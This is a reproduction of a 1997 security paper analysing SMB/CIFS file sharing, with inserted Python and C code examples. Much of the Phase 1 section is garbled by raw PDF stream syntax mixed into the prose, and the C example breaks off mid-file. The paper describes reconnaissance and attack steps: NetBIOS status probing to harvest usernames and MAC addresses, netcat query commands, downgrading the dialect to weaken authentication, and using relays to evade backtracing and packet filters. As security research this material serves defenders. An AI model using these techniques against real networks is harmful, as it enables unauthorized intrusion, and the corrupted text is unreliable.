CIFS: Common Insecurities Fail Scrutiny
=======================================

*Hobbit*, Avian Research, hobbit@avian.org, January 1997

Abstract
========

An analysis of TCP/IP NetBIOS file-sharing protocols is presented, and the steps involved in making a client to server SMB connection are described in some detail. Emphasis is placed on protocol and administrative vulnerabilities at various stages and fixes/workarounds for some of them, with the hope that the reader will better understand attacks and defenses alike. Several examples are presented, based upon using programs from the Unix Samba package to probe a target IP network and survey it for potential problems.

Introduction
============

We will explore the Server Message Block protocol and related issues, at the network level and higher, in the interest of presenting useful knowledge about Microsoft networking [loosely aka any of CIFS, NetBEUI/NetBIOS, Lan Manager compatible] security issues. Microsoft systems and applications, based on NT and various flavors of Windows, are forcibly entering homes and offices the world over and all expecting to speak SMB-based filesharing protocols among themselves as well as with products from other vendors. As the network security community has come to expect from most commercial offerings, these systems are distributed with poorly configured security settings which are seldom changed or even reviewed by their new owners before being plugged into the Internet. This leaves many of them vulnerable to trivial attacks, and administrators who *do* try to address the security issues often miss or misconfigure things, perhaps making their systems less obviously vulnerable but nonetheless still vulnerable. A major factor in the difficulty is that many security practitioners are venturing into new territory here, which turns out to be riddled with unexpected and undocumented pitfalls. People relatively new to the overall networking security field, including many of those implementing and installing said operating systems, often lack the experience gained from other OSes and environments and have no idea where to look for potential problems.

No specific audience is targeted here, but administrators with a primarily Unix and NFS background that are now being asked to also support Windows and NT environments may benefit the most from this. A necessarily Unix-centric viewpoint is taken, since that is where the author's main strengths are, but more importantly because Unix-based source code for a protocol implementation is freely available. Andy Tridgell's Samba package represents an amazing amount of very solid and still-evolving work, and allows Unix systems to interoperate with Microsoft and Lan Manager platforms to access files and other resources over TCP/IP networks. The examples and discussion herein refer to the "stable release" version 1.9.15 patchlevel 8 of Samba, with some minimal modifications geared toward exploring the security aspects of the protocol. While not the latest release, it suffices here, and the documentation that comes with it is highly recommended reading. The evolving Internet-draft for the Common Internet File System, or CIFS, is also a key reference work that expands upon original or "core" SMB and explains most of what the boys in Redmond hope will become a full Internet standard. Their own implementations mostly adhere to the draft, and many other vendors already support CIFS or some subset thereof. A few issues specific to NT necessarily appear, but NT security itself is a whole different bucket of worms and is mostly outside the scope of this text.
So far there seems to be very little hard information available about this, although I am aware of at least one other ongoing related effort. Several megabytes of NT-security archives, random whitepapers, RFCs, the CIFS spec, the Samba stuff, a few MS knowledge-base articles, strings extracted from binaries, and packet dumps have been dutifully waded through during the information-gathering stages of this project, and there are *still* many missing pieces. Some compatible platforms were unavailable for testing, notably OS/2. While often tedious, at least the way has been generously littered with occurrences of clapping hand to forehead and muttering "crikey, what are they *thinking*?!" The intent is not to compete against other works in progress, it is rather to aid them in moving forward.

This document may be freely copied and quoted in whole or part, provided that proper attribution is included. Many of the ideas contained herein are not new, although it is possible that one or two hitherto unknown problems or methods have been independently discovered. The point is to collect the information into one place and describe a stepwise procedure for evaluating this type of network environment, in a way that those of us who have hitherto mostly shunned any dealings with Microsoft and other PC network products can readily understand.

Groundwork: What's out there?
=============================

Little needs to be said here. Given a target network or set of IP addresses, well-known methods can be used for finding the target hosts -- the procedure which at least one large contractor refers to as "network contour assessment." DNS zone dumps in conjunction with tools such as "fping" can quickly locate active machines. To specifically locate potential SMB servers, scanning for TCP port 139 is a fairly safe bet. In the absence of packet filtering, connection attempts there either open or get refused so it is unnecessary to wait around for long timeouts. If machines respond to pinging or other connectivity tests but TCP connections to 139 time out, then it is likely that there is a packet filter in the way protecting against NetBIOS traffic. A Unix parallel would be running something like "rpcinfo -p" against a set of targets to find NFS servers, which may or may not be protected by a filter blocking traffic to the portmapper at TCP/UDP 111.

We will therefore assume having collected a list of potential SMB servers, and proceed to attack a single target therein. Note however that information gleaned from neighboring machines may be useful, just as in the traditional Unix-based environment. Remembering various information about a network as a whole and plugging it back into specific host attacks is a classic approach amply detailed in numerous papers.

Phase 0: Name determination
===========================

To establish an SMB session to a typical target, one must not only have its IP address but also know its "computer name." This is an arbitrary name similar to a DNS hostname assigned by an administrator, unique within an organization or at least a given LAN, and in many installations the computername and DNS name are the same for administrative convenience. Name resolution is by definition a separate entity from SMB itself, and employs a variety of methods including static files, DNS, WINS, and local-wire broadcasts. When a machine is running NetBIOS over TCP/IP, or "NBT", it attaches its own little name service to UDP port 137, which makes a continual effort to both locate and disseminate as much info as it can about services on the local LAN. One of its functions is periodically broadcasting its own set of names on to the local wire, to notify immediate neighbors that it exists and offers services. IP routers generally do not forward these broadcasts, so passive receivers outside an immediate subnet will not learn these names or which IP hosts they belong to. Fortunately there is usually an easy way to remotely determine the name, known as a "node status query." The name service also replies to direct queries about certain names associated with its own particular host, and if it is running as a WINS server it can give out even more information.

There are two basic query types -- IP address, and node status. Status query might be more properly called name query, since sending one should elicit an answer containing all of a target's NetBIOS names [beware that RFC 1002 itself uses "name query" for the address lookup and "node status request" for the other]. Both are remarkably similar in structure to DNS queries, and are indeed a variant of the DNS protocol itself. A NetBIOS address query is for resource record type 32 and a status query is type 33; both of class IN or 1. With traditional NetBIOS over non-IP transports such as NetBEUI or local-LAN IPX, computer names are normally uppercase, 16 bytes long, and padded with spaces, which are illegal characters in the DNS spec for hostnames. To get around this in IP environments, NetBIOS names are mangled into a rather bizarre format. The official spec for this is in RFCs 1001 and 1002, but to quickly sum it up: each ASCII character in a name is split into 4-bit halves, and each half is added to ascii value 0x41 [uppercase "A"] to form a new byte. Each original character therefore becomes two mangled characters in the range A-P, doubling the entire length to 32 bytes. Thus, the name "FEH" gets padded out with spaces and becomes

    ascii string "FEH             "                           -- is
    hex  46 45 48 20 20 20 20 20 20 20 20 20 20 20 20 20      -- split into
    hex  4 6 4 5 4 8 2 0 2 0 2 0 2 0 2 0 2 0 ...etc...        -- add to "A" gives
    hex  45 47 45 46 45 49 43 41 43 41 43 41 ...etc...        -- which is
    mangled string "EGEFEICACACACACACACACACACACACACA"

The name_mangle() routine in Samba's util.c does this translation. The characteristic "...CACACACA" string trailer makes NetBIOS names easily recognizable when they show up in packet dumps and such. Of particular interest is the wildcard name "*", but padded with *nulls* instead of spaces. This mangles to "CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". Under most circumstances, name-service listeners are required to reply to queries for this wildcard name as well as for their own computernames. Therefore sending a status query for this "*" name is very likely to produce a name reply as resource records containing the target's NetBIOS names, which oddly enough come back in *non-mangled* format. Multiple copies of some names usually show up, but they are subtly different. In practice the 16th byte of a non-mangled name is a type byte, which is a different animal from a DNS resource-record type! When a NetBIOS machine comes up its "name registration" broadcasts contain multiple instances of its own name and other strings, but with several different *NetBIOS* name types that can indicate different services. Note herein that mangled names are of length 32 or 0x20, address queries are RR type 32, and several returned names have *type* 0x20. Therefore a lot of 0x20s show up in these DNS-style packets and can make things rather confusing. There seem to be many name types, not particularly well documented except maybe in knowledge bases or resource kits, but the important ones are

    0x00    base computernames and workgroups, also in "*" queries
    0x01    master browser, in magic __MSBROWSE__ cookie
    0x03    messaging/alerter service; name of logged-in user
    0x20    resource-sharing "server service" name
    0x1B    domain master-browser name
    0x1C    domain controller name
    0x1E    domain/workgroup master browser election announcement [?]

The mangling example above has 0x20 as its type byte, therefore building the name variant used when connecting to fileservers. Server and workstation machines alike can provide various different services, and are thus usually aware of more than one name/type at once. In fact most of them return a group of five or so in a status reply, including the base computer name and whatever "workgroup" the target is a member of. Name type 0 should be used with the special "*" query which is null-padded anyway, or a response is unlikely. If NO name of type 0x20 is present in the list, it is unlikely that the machine in question has been configured to share any of its own resources and attempts to connect sessions to it will likely fail. Name type 0x3 in the reply often reveals the username logged in at the machine's console, and should be collected as a potential username to try against this or neighboring targets. The base name may also be the same as a username, since in typical small office environments the machines are often associated with specific people. The special name "^A^B__MSBROWSE__^B^A" [last char being control-A, or type 1] indicates a "master browser" which is a machine that collects info about neighboring machines -- in particular, their IP addresses. A master browser is a fortunate find since we can likely get a "browse list" from that machine [described later] and then possibly query that same target for all the other names and addresses it claims to know about.

One can do "nbtstat -A {ip-addr}" from a Microsoft platform to direct "*" queries to a specific IP-aware target and obtain its name list. In the absence of a mapping in an LMHOSTS file or some other mechanism, a specific machine can be found using "nbtstat -a \\NAME" if it is on the local wire. An address query is sent to the broadcast address of the connected subnet, and if a machine responds then a unicast status query is sent to it. For reasons unfathomable Microsoft platforms usually send status replies FROM UDP 137 TO UDP 137, regardless of the UDP source ports of query packets, so the querying application must locally bind to 137 [requiring root on Unix boxes] to ensure that replies can be received. Oddly enough, *address* replies are normally returned to whatever source port the query was from! To handle this fine example of the IP savvy out there in Redmond, a tiny patch is needed for the "nmblookup" Samba program, which as it comes grabs a high port and is unlikely to receive status replies. It will then work similarly to "nbtstat" when run as root, sending the "*" query if given the "-S \*" argument [quoting "*" to the shell], and also accepts a *unicast* target IP as the -B argument.
Nmblookup also has an interesting feature that allows setting the hex name type in a query -- for example, a name of the form "TARGET#1C" forces the name type to be 0x1C. A slightly more "raw" equivalent of the generic "*" query, which sometimes elicits a response containing no names but a response nonetheless, can be done using netcat to locally bind UDP port 137 and send a query. Feed the following input bytes into "nc -v -u -w 3 -p 137 target 137" and the output through "cat -v":

    0x00    # .     1
    0x03    # .     2   # xid
    0x00    # .     3
    0x00    # .     4   # flags
    0x00    # .     5
    0x01    # .     6   # qcnt
    0x00    # .     7
    0x00    # .     8   # rcnt
    0x00    # .     9
    0x00    # .    10   # nscnt
    0x00    # .    11
    0x00    # .    12   # acnt
    0x20    # ' '  13   # namelen
    0x43    # C    14   # mangled "*" ...
    0x4b    # K    15
    0x41    # A    16
    0x41    # A    17
    0x41    # A    18
    0x41    # A    19
    0x41    # A    20
    0x41    # A    21
    0x41    # A    22
    0x41    # A    23
    0x41    # A    24
    0x41    # A    25
    0x41    # A    26
    0x41    # A    27
    0x41    # A    28
    0x41    # A    29
    0x41    # A    30
    0x41    # A    31
    0x41    # A    32
    0x41    # A    33
    0x41    # A    34
    0x41    # A    35
    0x41    # A    36
    0x41    # A    37
    0x41    # A    38
    0x41    # A    39
    0x41    # A    40
    0x41    # A    41
    0x41    # A    42
    0x41    # A    43
    0x41    # A    44
    0x41    # A    45   # [bytes 44-45: embedded type byte 0x00]
    0x00    # .    46   # terminator
    0x00    # .    47
    0x21    # !    48   # querytype NBTSTAT
    0x00    # .    49
    0x01    # .    50   # class IN

In rare cases, an additional "scope ID" may be tacked on to mangled names in the format "EGEFEICACACACACACACACACACACACACA.scope" just like in multipart DNS names. A scope does not contain spaces, and therefore can and indeed is sent unchanged in hostname queries. Scope names are further discussed later under "defenses", since they can play a role therein.

Firing "*" queries at either selected hosts or the IP subnet's directed broadcast is another way of probing around for active SMB hosts. Most routers do not forward directed-subnet broadcast, but ones that do may get you all the answers in one or two shots! In most cases, scanning for TCP port 139 and following up with unicast UDP status queries is still likely to be faster and more reliable, especially when a target for some reason won't respond to "*" queries. This sometimes happens if the messaging or alerter service is shut down on the target, which is one recommended security procedure in several documents. If you suspect this case, try asking for "WORKGROUP", parts of the target's DNS name, and other likely strings like variants on the name of the organization or people within it. Status-querying explicitly for a machine's name or workgroup using type 0 should also cause it to respond, and a lack of any type 0x3 names in the list would confirm that messaging is disabled.
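The mangling rules and the raw wildcard status query above, worked in code. This is an added example written for this edit, not code from the original paper or from Samba. It does the RFC 1001/1002 first-level encoding in both directions, builds the same 50-byte NBSTAT query as the byte table (plus optional scope-ID labels, which go on unmangled), and decodes a node status reply into names, type bytes and the group flag, and goes one step past the text by also pulling out the 6-byte unit ID (the adapter's MAC address) that RFC 1002 places right after the name list. The host FEH, workgroup AVIAN, user HOBBIT, the MAC address and the reply bytes are all constructed for the example, not captured from a real machine; the live path at the bottom needs root because it binds UDP 137, for the reason the text gives.

```python
import struct

NB_TYPE, NBSTAT_TYPE, CLASS_IN = 0x20, 0x21, 0x01   # RR types 32 and 33, class IN


def nbt_encode_name(name, name_type=0x00, pad=b" "):
    """First-level encoding from RFC 1001/1002: pad the name to 15 bytes,
    append the NetBIOS type byte, then emit 'A' + nibble for every nibble."""
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([name_type])
    return "".join(chr(0x41 + n) for b in raw for n in (b >> 4, b & 0x0F))


def nbt_decode_name(mangled):
    """Inverse of nbt_encode_name: returns (name, type_byte)."""
    pairs = [(ord(mangled[i]) - 0x41, ord(mangled[i + 1]) - 0x41)
             for i in range(0, 32, 2)]
    raw = bytes((hi << 4) | lo for hi, lo in pairs)
    return raw[:15].rstrip(b" \x00").decode("ascii", "replace"), raw[15]


def build_node_status_query(name="*", name_type=0x00, xid=0x0003, scope=""):
    """NODE STATUS REQUEST: DNS-style 12-byte header with one question of
    QTYPE NBSTAT (0x21), QCLASS IN.  The wildcard is NUL-padded, not
    space-padded.  50 bytes without a scope, matching the byte table above."""
    header = struct.pack(">HHHHHH", xid, 0x0000, 1, 0, 0, 0)   # xid, flags, qd, an, ns, ar
    pad = b"\x00" if name == "*" else b" "
    qname = bytes([32]) + nbt_encode_name(name, name_type, pad).encode("ascii")
    for label in (scope.split(".") if scope else []):         # scope labels are not mangled
        qname += bytes([len(label)]) + label.encode("ascii")
    return header + qname + b"\x00" + struct.pack(">HH", NBSTAT_TYPE, CLASS_IN)


def parse_node_status_response(data):
    """Decode a NODE STATUS RESPONSE into (xid, [(name, type, is_group)], unit_id).
    The names come back raw: 15 bytes plus the type byte, not mangled."""
    xid, flags, _qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a response, or no answer record")
    off = 12
    while data[off]:                      # skip the length-prefixed RR_NAME labels
        off += 1 + data[off]
    off += 1
    rr_type, rr_class, _ttl, _rdlen = struct.unpack_from(">HHIH", data, off)
    off += 10
    if (rr_type, rr_class) != (NBSTAT_TYPE, CLASS_IN):
        raise ValueError("unexpected RR type/class %#x/%#x" % (rr_type, rr_class))
    count, off = data[off], off + 1
    names = []
    for _ in range(count):                # NODE_NAME entries: 15 + 1 + 2-byte NAME_FLAGS
        raw, ntype = data[off:off + 15], data[off + 15]
        nflags = struct.unpack_from(">H", data, off + 16)[0]
        names.append((raw.rstrip(b" \x00").decode("ascii", "replace"),
                      ntype, bool(nflags & 0x8000)))   # bit 15 of NAME_FLAGS = group name
        off += 18
    unit_id = ":".join("%02x" % b for b in data[off:off + 6])   # STATISTICS.UNIT_ID
    return xid, names, unit_id


def constructed_reply(xid=0x0003):
    """Constructed (not captured) reply from a host FEH in workgroup AVIAN with
    user HOBBIT at the console, shaped like a real answer to the query above."""
    entries = [(b"FEH", 0x00, 0x0400), (b"AVIAN", 0x00, 0x8400),
               (b"FEH", 0x20, 0x0400), (b"HOBBIT", 0x03, 0x0400),
               (b"AVIAN", 0x1E, 0x8400)]                   # 0x8000 = group, 0x0400 = active
    rdata = bytes([len(entries)])
    for n, t, f in entries:
        rdata += n.ljust(15, b" ") + bytes([t]) + struct.pack(">H", f)
    rdata += bytes.fromhex("0000c04f1234") + b"\x00" * 40    # made-up unit ID, zeroed stats
    rr_name = bytes([32]) + nbt_encode_name("*", 0x00, b"\x00").encode("ascii") + b"\x00"
    return (struct.pack(">HHHHHH", xid, 0x8400, 0, 1, 0, 0) + rr_name
            + struct.pack(">HHIH", NBSTAT_TYPE, CLASS_IN, 0, len(rdata)) + rdata)


if __name__ == "__main__":
    import socket, sys
    if len(sys.argv) > 1:                 # live: python nbtquery.py 10.0.0.5  (as root, binds 137)
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.bind(("", 137))
        s.settimeout(3)
        s.sendto(build_node_status_query(), (sys.argv[1], 137))
        data = s.recv(1024)
    else:
        data = constructed_reply()
    xid, names, unit_id = parse_node_status_response(data)
    for name, ntype, group in names:
        print("%-16s <%02X> %s" % (name, ntype, "GROUP" if group else "UNIQUE"))
    print("unit id (MAC):", unit_id)
```

The parser walks the RR_NAME labels rather than assuming 34 bytes so that a reply carrying a scope ID still decodes, and it checks the RR type before trusting the count byte; a reply with no type 0x20 entry is exactly the "not sharing anything" case described above.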
Whether due to packet filters or some other reason, getting *no* reply for all this effort is still not a reason to give up -- it is UDP after all, and further name guesses can be plugged in during the next phase.

Phase 1: The TCP session
========================

Next we open a TCP connection to port 139 on the target. There is no longer a need for any special local ports, so smbclient can run as a normal Unix user. The "called" target's computername of the appropriate type and the "caller" client name are name-mangled and plugged into a Session Request block sent to the server. The idea here is to sanity-check the name determination step and ensure that one is conversing with the correct machine -- especially wise in the inevitable cases of outdated LMHOSTS files or DNS data. If the target server's name is right a "positive response" is sent back, and the connection remains open. If the wrong server name is passed in, a "negative response" is sent along with an error code, and the server end of the connection starts a TCP shutdown by sending a FIN.
Nothing further can be done with the failed) Tj 1 0 0 1 54 638.4 Tm (connection; a new one must be opened to try a different servername. The name) Tj 1 0 0 1 54 627.9 Tm (of the connecting client is largely irrelevant and can even be null, although) Tj 1 0 0 1 54 617.4 Tm (its name type is generally 0. However, the name the client supplies is the) Tj 1 0 0 1 54 606.9 Tm (name that gets logged during later phases such as user logins. The client) Tj 1 0 0 1 54 596.4 Tm (name may also affect behavior against NT machines which have such settable) Tj 1 0 0 1 54 585.9 Tm (parameters as which workstations a given user may log in from. It appears) Tj 1 0 0 1 54 575.4 Tm (that the source IP address is *completely* irrelevant to Microsoft-based) Tj 1 0 0 1 54 564.9 Tm (servers, which simply accept the given client name. This is a first hint) Tj 1 0 0 1 54 554.4 Tm (about how much functionality is left up to the client. A vague Unix parallel) Tj 1 0 0 1 54 543.9 Tm (might be faking the client hostname in mount requests to be something in the) Tj 1 0 0 1 54 533.4 Tm (target's export list, which usually worked against early NFS implementations.) Tj 1 0 0 1 54 512.4 Tm (This session request is only the first of many steps taken behind the scenes) Tj 1 0 0 1 54 501.9 Tm (by most client commands. From a command prompt on a Microsoft box one does) Tj 1 0 0 1 54 491.4 Tm ("net use \\\\TARGET\\SHARENAME" to begin access to a filesystem, or "net view) Tj 1 0 0 1 54 480.9 Tm (\\\\TARGET" to see a target's list of available services. Samba's "smbclient") Tj 1 0 0 1 54 470.4 Tm (accepts the same syntax, although the backslashes need to be isolated from) Tj 1 0 0 1 54 459.9 Tm (the shell by enclosing in quotes or specifying \\\\\\\\TARGET\\\\RESOURCE. It also) Tj 1 0 0 1 54 449.4 Tm (accepts "-L TARGET" to list the available resources, which in any case is) Tj 1 0 0 1 54 438.9 Tm (what we want to do first. 
Smbclient by default picks up the caller name) Tj 1 0 0 1 54 428.4 Tm (from the hostname of the Unix machine it is running on, but we can specify) Tj 1 0 0 1 54 417.9 Tm ("-n fakename" to set it to something arbitrary.) Tj 1 0 0 1 54 396.9 Tm (An error response is usually one of two: either the passed servername wasn't) Tj 1 0 0 1 54 386.4 Tm (correct, or the name was right but no service of the requested name type is) Tj 1 0 0 1 54 375.9 Tm (running. Smbclient translates these errors respectively as "called name not) Tj 1 0 0 1 54 365.4 Tm (present" or "not listening on called name." Usually if server-name/type 0x20) Tj 1 0 0 1 54 354.9 Tm (is unreachable, the target is not sharing its resources at all and there isn't) Tj 1 0 0 1 54 344.4 Tm (much more we can do with it. Sessions to server-name/type 0x3 may work to) Tj 1 0 0 1 54 333.9 Tm (reach the messaging service and is sometimes a way to check if we got at least) Tj 1 0 0 1 54 323.4 Tm (one name right, but short of sending annoying messages to the console user it) Tj 1 0 0 1 54 312.9 Tm (is not particularly useful. Smbclient has a "-M" argument to do message) Tj 1 0 0 1 54 302.4 Tm (sending. The spec provides for a "not listening for CALLING name" error,) Tj 1 0 0 1 54 291.9 Tm (implying a potential facility for access restriction by specific client, but) Tj 1 0 0 1 54 281.4 Tm (today's implementations don't seem to care.) Tj 1 0 0 1 54 260.4 Tm (If all UDP name queries above have failed, the same sorts of guessing at the) Tj 1 0 0 1 54 249.9 Tm (target's computername can be tried here, one per TCP connection. If the) Tj 1 0 0 1 54 239.4 Tm (connection is relayed via an intermediate machine such as a proxy, the client) Tj 1 0 0 1 54 228.9 Tm (must still supply the correct name of the target server. Microsoft clients) Tj 1 0 0 1 54 218.4 Tm (can be faked out with an appropriate LMHOSTS entry with the name of the final) Tj 1 0 0 1 54 207.9 Tm (destination but the IP address of the *relayer*. 
As long as the final target) Tj 1 0 0 1 54 197.4 Tm (sees its own name in the request, it doesn't matter how it got there. An) Tj 1 0 0 1 54 186.9 Tm (example fast way to script up different LMHOSTS names on the fly would be) Tj 1 0 0 1 54 176.4 Tm (having "#INCLUDE ramdisk-file-name" in the main LMHOSTS file, to avoid) Tj 1 0 0 1 54 165.9 Tm (repeatedly writing to the hard drive just to test a bunch of targets. The) Tj 1 0 0 1 54 155.4 Tm (CIFS spec mentions that the magic target name "*SMBSERVER" is supposed to be) Tj 1 0 0 1 54 144.9 Tm (some sort of wildcard, but it is optional and no current Microsoft platforms) Tj 1 0 0 1 54 134.4 Tm (seem to accept it to open sessions. Samba does, simply because by design it) Tj 1 0 0 1 54 123.9 Tm (accepts any old pair of names for sessions and more sensibly logs the client's) Tj 1 0 0 1 54 113.4 Tm (IP address if appropriately configured.) Tj 1 0 0 1 54 92.4 Tm (Using a relay host can foil backtracing efforts by someone who notices odd) Tj 1 0 0 1 54 81.9 Tm (network activity or log entries and goes to investigate. A suitable relayer) Tj ET Q endstream endobj 38 0 obj 5701 endobj 33 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R36 36 0 R >> >> /Contents [ 34 0 R 37 0 R ] >> endobj 40 0 obj << /Length 41 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 41 0 obj 48 endobj 42 0 obj << /Type /Font /Name /R42 /Subtype /Type1 /BaseFont /Courier >> endobj 43 0 obj << /Length 44 0 R >> stream BT /R42 10 Tf 1 0 0 1 54 711.9 Tm (program can take just about any form, such a simple netcat script, a SOCKS) Tj 1 0 0 1 54 701.4 Tm (gateway, or even Microsoft's own "Catapult" proxy package. The relay would) Tj 1 0 0 1 54 690.9 Tm (presumably listen on TCP 139 and forward the connection, but with smbclient) Tj 1 0 0 1 54 680.4 Tm (the relay can listen on any other port and we can supply the "-p {portnum}") Tj 1 0 0 1 54 669.9 Tm (argument to reach it. 
If a high-port relay is already behind a packet filter that blocks TCP 139 but allows >1024, not only is the firewall bypassed but the resulting server connection may look like a completely normal one from a trusted inside host.

Some Linux distributions anticipate being used as Samba servers, and come with an "nbsession" entry in inetd.conf but no server program to handle the connection. These will listen on TCP 139 but immediately close, while noting an appropriate error in the syslog.

A brief digression about SMB
============================

So far none of this has involved any actual Shared Message Block protocol. The CIFS spec contains a detailed rundown on SMB packet formats. While SMB can run over various transports including IP, here we only discuss its usual interaction via TCP 139. A 4-byte block length is sent down the TCP stream followed by the block itself, so the transport handlers then know how much to read from or write to the network. SMB is thus independent of how IP-level packets split up the stream -- it doesn't care, it just keeps reading a connected socket until it satisfies the length's worth or times out. SMB blocks can be up to 65536 bytes long *excluding* the length integer, but in practice the blocks are usually smaller. SMB also trusts the TCP reliable transport layer to segregate different client sessions.
In an alternate mode that uses UDP 138 the data blocks look almost the same, except that 12 bytes of unused "filler" are used under UDP to pass various session and sequencing context info. Many SMB request types support what is called the "AndX" mechanism, which provides a way to send several requests at once. Fields in these specify how to locate any subsequent SMB requests that were "batched" into this block. See the spec for more information.

The Samba code builds SMB blocks into buffers using a bunch of hairy macros with names like "SSVAL" to move short and long integers around and convert byte-ordering. [For a fun time, try unsnarling "byteorder.h".] Since Samba builds these internal buffers to include the 4-byte block length at offset 0, any other offsets described here are relative to that. After the block length comes the SMB header itself, starting at offset 4 in our reference frame with 0xFF, 'S', 'M', 'B'. A one-byte command code and several fixed-length fields follow, ending the SMB header proper. The command code indicates the type of SMB being requested or responded to. The request / response descriptions in CIFS exclude the header, and only detail what follows. After the header is a length byte and a variable-length bunch of two-byte "parameter words", and finally any associated buffers which can contain values, strings, file data, or whatever. A rough chart of this is given in Appendix C.
The parameter words begin at offset 37 and are where most of the work gets done; in Samba they are called "smb_vwvN" where N is a number starting with 0. The buffers start at a variable offset depending on how many parameter words preceded; Samba has a routine called smb_buf() to dig through and find it. It should be noted that while the leading length bytes are in network order, all values inside the SMB blocks must be in "Intel" or little-endian order! In general both the block structure *and* what gets placed into it are rather complex and confusing, and if it's any reassurance, the comments in earlier versions of Samba hint that much of it started as total guesswork and verbatim copying of block sections from packet dumps of sessions between MS boxes. As more SMB-savvy contributors came into the Samba development picture, these blind but somehow functional shots in the dark became better explained and recoded.

When working with NT we often encounter something called "unicode", a somewhat warped international character encoding standard. Strings are encoded into sequences of two-byte words, wasting twice the storage space required.
This causes the string "ABC" to appear as "41 00 42 00 43 00" in hex dumps, and pops up in registry entries, SMB packets, and many other places. The lengths of unicode strings are usually stored elsewhere, such as [but not always] in an SMB parameter word, and there is sometimes confusion about precisely how long any string is. For example, is unicode "ABC" of size 3 or size 6? If we include and count a terminating null as required when sending passwords, is it then of size 4, 7, or perhaps even 8? To make matters even worse the strings must in theory be word-aligned in memory, and to force this to be true a leading null is supposed to be *inserted* ahead of the first character. The latest Samba server version contains a small fix for a common case where NT clients cannot quite decide consistently about the length of a null password string, and may send it as either 1 or 0.

One important part of the header we need to be aware of is two words beginning at offset 9 -- the response class and error codes, called smb_rcls and smb_err. These describe protocol errors in some detail, and there is a fairly large translation table of the most common errors near the end of client.c. The two error classes we usually see in practice are DOS and SERVER. There are several different possible class/error response combinations to describe any one kind of problem, such as failure to authenticate a user, and which pairs get sent back depends upon what type of platform the target is.
The patch kit below includes a small routine called interpret_error() that boils an assortment of common errors down into a couple of standard return codes. This helps us distinguish between fatal errors, nonfatal errors and password problems, which figures significantly in a later phase of the attack. Some of the information here is not documented in CIFS, but can be found by doing "net helpmsg {smb_err #}" under NT, which seems to have a very complete set of error message texts available.

Phase 2: Dialect negotiation
============================

Assuming an open TCP connection and successful session request, SMB request blocks may now be sent. The next step is for client and server to agree on the "dialect" of SMB protocol they can support. Over time, SMB has evolved from the earliest "Microsoft networks" core protocol, through two types of Lan Manager and up to the current variant that NT uses. Each new dialect adds a couple of features, to support things like new authentication protocols and long filenames. The client sends a list of dialects it supports as [get this!] a bunch of null-terminated ASCII strings, including entries like

    PC NETWORK PROGRAM 1.0
    MICROSOFT NETWORKS 1.03
    LANMAN1.0
    LM1.2X002
    LANMAN2.1
    NT LM 0.12

which the server string-compares against dialects it recognizes and picks the "highest" common protocol level.
There is a big comment in Samba's server.c just before reply_negprot() describing what most server platforms do with this. A response is built and sent back to the client, containing several important items: a numeric index into the dialect list to indicate which to use, some security-relevant flags, and an optional 8-byte "encryption key" to use for authentication. This "key" is a random challenge nonce that the server generates and temporarily remembers. A confusingly named "session key" is also sent, which is just some sort of unique but mostly unimportant identifier and *not* the same as the cryptkey.

Most SMB servers support backward dialect compatibility, and even if we support the latest NT we can always lie and exclude some of the later dialects from the list we send. Sessions between two NT machines involve more complex security protocols, so for our attack purposes it is definitely worth our while to convince a server that we are a dumb old client that can't handle the fancier stuff.
Microsoft clients can't do this but smbclient can, with a settable max_protocol variable, and we should therefore plug "-m LANMAN2" into our command line to force the server to dumb itself down somewhat. Smbclient also parses dialects as strings here, not numeric levels.

The security mode flags appear in smb_vwv1, and we need to pay attention to the low two bits thereof. Smbclient tells us what this "sec mode" is at debug level 3. The earlier NetBIOS implementations optionally required a simple password to connect to a shared filesystem, and had no real concept of *who* was connecting as long as the correct password was supplied. Everyone using such a fileshare must know the single password for it, which is considered fairly lame from a security standpoint. This is called "share-level security", and is used by Windows for Workgroups, Samba if appropriately configured, and maybe some other Lan Manager platforms. Later dialects have a concept of individual user login, and indicate this "user-level security" by setting the LSB of the security flags. The next higher bit in the flags indicates whether the client should use "password encryption" or not. Thus if smbclient reports "sec mode 3" as it does when connecting to most NT servers, both of these bits are set. Sometimes we see a reference to "server-level security", but this simply means that authentication data is forwarded to a Domain Controller machine for validation and does not affect the mode bits.
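
The block layout from the digression above (length prefix, header, parameter words, smb_buf()), the smb_rcls/smb_err classes, and the negprot reply fields just described (dialect index, sec mode bits, the 8-byte challenge) as one added example in C. This is my code, not the paper's patch kit and not Samba's; the field offsets are the ones Samba's headers use, the error codes are the classic LAN Manager DOS/SERVER values, the interpret_error() mapping is my own simplification of what the paper says its routine does, and both sample blocks are constructed by hand.

```c
/* Added example, not from the paper or from Samba: a parser for the SMB block layout described
 * above, in Samba's reference frame (4-byte block length at offset 0, header at 4, word count
 * at 36, parameter words at 37).  The DOS/SERVER codes are the classic LAN Manager values;
 * interpret_error() is my simplification of the paper's routine; samples are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
enum { SMB_HDR = 4, SMB_COM = 8, SMB_RCLS = 9, SMB_ERR = 11, SMB_WCT = 36, SMB_VWV = 37 };
enum { ERRDOS = 1, ERRSRV = 2 };                         /* the two error classes seen in practice */
enum { ERRnoaccess = 5, ERRbadpw = 2, ERRbaduid = 91 };  /* DOS 5, SERVER 2, SERVER 91 */
enum { SMBnegprot = 0x72, SMBsesssetupX = 0x73 };
enum smb_outcome { SMB_BAD_BLOCK = -1, SMB_OK, SMB_PASSWORD, SMB_NONFATAL, SMB_FATAL };

struct smb_hdr {
    uint8_t cmd, rcls, wct; uint16_t err, bcc;
    const uint8_t *vwv;   /* smb_vwv0, smb_vwv1, ...: little-endian 16-bit words */
    const uint8_t *buf;   /* the variable-offset buffer that Samba's smb_buf() locates */
};
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
/* The length prefix is in NETWORK order, unlike everything inside the block; byte 0 is the
 * NetBIOS message type (0 = session message), so the 32-bit big-endian value is the length. */
static uint32_t smb_block_len(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* 0 with h filled in, or -1 unless the bytes form exactly one well-formed block. */
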